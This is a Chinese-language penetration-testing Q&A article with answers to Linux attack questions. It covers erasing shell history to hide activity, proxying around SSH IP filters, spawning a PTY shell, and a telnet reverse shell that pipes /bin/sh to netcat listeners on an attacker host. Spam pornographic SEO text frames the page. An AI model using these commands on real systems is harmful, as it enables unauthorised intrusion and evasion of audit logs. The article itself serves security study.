成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

經典的Linux滲透測試問題

安全 黑客攻防
此攻略中的題目收集于Wooyun zone,每道題其實都有一些不同的解法,且本套題中有不少題的題目寫的不是很清晰,容易產生誤解。本題解僅作拋磚引玉,希望有其他解答方案的同學可以留言共同探討。

此攻略中的題目收集于Wooyun zone,每道題其實都有一些不同的解法,且本套題中有不少題的題目寫的不是很清晰,容易產生誤解。本題解僅作拋磚引玉,希望有其他解答方案的同學可以留言共同探討。

1、登錄系統如何不讓記錄歷史操作命令?

1.修改/etc/profile文件將HISTSIZE = 1000為0或1 # 91ri.org注:HISTSIZE 是環境變量中用于設置可以保存的歷史命令條數,設置為0便不會保存。小編***見到此題目是在wooyun zone 但zone上面的回答都是下面的2,3兩種方案,實際上***題意的應該是修改環境變量這種。

2.或者清除用戶主目錄路徑下, bash_history

3.立即清空歷史命令的歷史記錄

history -c

4.bash執行的命令不是立即命令名稱寫入到歷史文件中,而是存儲在內部緩沖區,因此也將等bash退出時一并寫入。

但是,你可以調用的歷史w’的命令bash立即更新歷史文件。

history -w

2、ssh 限制了ip登錄,要求ssh登錄,如何處理?

如果確認被過濾了,并且你有一個shell的話,可以先在這個機器里跑個lhtran.c做一個 socks proxy,如果端口都被過濾了,就再用一次lhtran回連一個socks proxy,這個時候你可以試試用這個代理登錄他的ssh,如果好運的話(allow里寫了本機的地址),你可以進入系統。

#91ri.org注:wooyun上有人說可以使用iptable轉發端口突破,似乎如果只有個user的shell,不能操作iptable吧。也許小編知識水平不夠高,不知各位讀者有什么想法?歡迎留言討論,這個問題出的不是很嚴謹,應該有其他方法。

3、在ssh后門里看不到對方是否登錄的情況下,用哪個命令可以準確顯示出來?

可以嘗試通過linux下的w和who命令來查看。

關于w和who命令的用法可參考《Linux中W與Who命令的使用》

4、如何獲取真正的tty

解決這道題我們要先知道兩個前置知識,tty與console有什么區別:

1. console是輸出設備,tty是字符設備

2. console是虛擬設備,映射到真正tty上面

不過這題作者似乎寫的不是很明白,小編按題意給出個人理解,大家自行參考。

解法1:

[test@localhost ~]$ tty
/dev/tty2

解法2(wooyun@壞蝦):

python -c 'import pty; pty.spawn("/bin/sh")'

解法3:

[test@localhost ~]$ who

 

who11

 

5、如何使用telnet進行反向連接

這道題可難為我們團隊的同學了,網上的資料說這個無法實現,而且題目感覺寫的不清晰,我們做了2天才解決這個問題。

telnet反向連接在實戰中的作用:

案例1:黑客試圖獲取某工業級數據包檢測防火墻或者路由器之后(基于路由的防火墻,不代理任何服務)的一臺UNIX的系統的WEB服務器的訪問權。防火墻僅對外網開放了80及443,這臺WEB服務器存在phf漏洞(phf漏洞是什么自行腦補),黑客可遠程對該web服務器執行命令。此時就可以通過unix自帶的telnet獲取到一個交互式的SHELL。(91ri.org補充:因為之所以不用NC是因為服務器一般都有安裝telnet,且很少受到限制。而connect又是從目標主機中發起,所以可以達到穿透防火墻及內網的作用。)

環境假設:

target ip : 192.168.128.105

hacker ip:192.168.128.100

telnet 反向連接命令:

target :

/usr/bin/telnet 192.168.128.100 80 |/bin/sh |/usr/bin/telnet 192.168.128.100

 

RET1

 

hacker:

/opt/netcat/bin/nc -l -n -v -p 80
/opt/netcat/bin/nc -l -n -v -p 25

 

ret2

 

 

ret3

 

命令說明:實際上我們是將telnet連接到hacker的80端口的NC上,為了與傳統的unix的輸入輸出機制保持一致,我們通過標準輸出即鍵盤通過管道輸給了Bourne shell。而由/bin/sh 執行命令的結果再通過管道輸出telnet,并返回到hacker的25端口的NC上。

之所以選擇80和25是因為大多數防火墻都允許它們向外訪問,假如沒有防火墻,那么選什么端口都可以。

責任編輯:藍雨淚 來源: 網絡安全攻防實驗室
相關推薦

2010-03-03 17:43:12

Android系統

2018-12-10 11:30:06

Openstack面試命令

2010-03-01 18:21:08

Python測試

2010-02-07 15:42:46

Android單元測試

2010-01-27 09:31:39

C++Test測試

2010-01-22 14:41:46

C++Test

2020-03-23 09:56:50

軟件測試面試技術

2016-09-09 01:14:17

2021-08-05 11:30:49

Linux滲透測試

2013-12-03 10:11:41

LinuxLinux面試題

2010-09-16 16:08:46

2010-01-05 14:37:39

JSON POST

2016-07-14 10:43:34

2015-06-24 09:53:05

2019-03-19 09:00:00

LinuxBackBox滲透測試

2019-05-16 10:46:06

滲透測試Kali Linux工具

2010-09-17 16:25:58

2017-07-24 17:00:49

2013-11-06 16:38:59

2021-07-15 10:46:21

滲透測試網絡安全網絡攻擊
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 欧美精品在线免费 | 成人黄在线观看 | 久久综合久 | 91色站 | 精精国产xxxx视频在线野外 | 免费视频久久久久 | 一区二区三区亚洲精品国 | 男女下面一进一出网站 | a级黄色片在线观看 | av在线免费观看不卡 | 欧美色综合一区二区三区 | 人人干免费| 中文字幕日韩一区 | 两性午夜视频 | 精品在线观看一区二区 | 日韩精品一区二区在线观看 | 三级成人在线 | 一级美国黄色片 | 成人婷婷 | 亚洲日本一区二区三区四区 | 欧美a在线 | 91精品国产色综合久久不卡98口 | 国产免费拔擦拔擦8x高清 | 国产精品爱久久久久久久 | 免费一区二区三区 | 99九九视频 | 日韩成人免费视频 | 精品久久久网站 | 日韩免费视频一区二区 | 91精品国产91久久综合桃花 | 日韩免费av网站 | 久久综合婷婷 | 亚洲乱码国产乱码精品精98午夜 | 欧美视频偷拍 | 亚洲精品日韩一区二区电影 | 久久av网站| 日韩三区 | 亚洲精品视频免费看 | 国产激情一区二区三区 | 国产精品免费大片 | 日韩一级免费看 |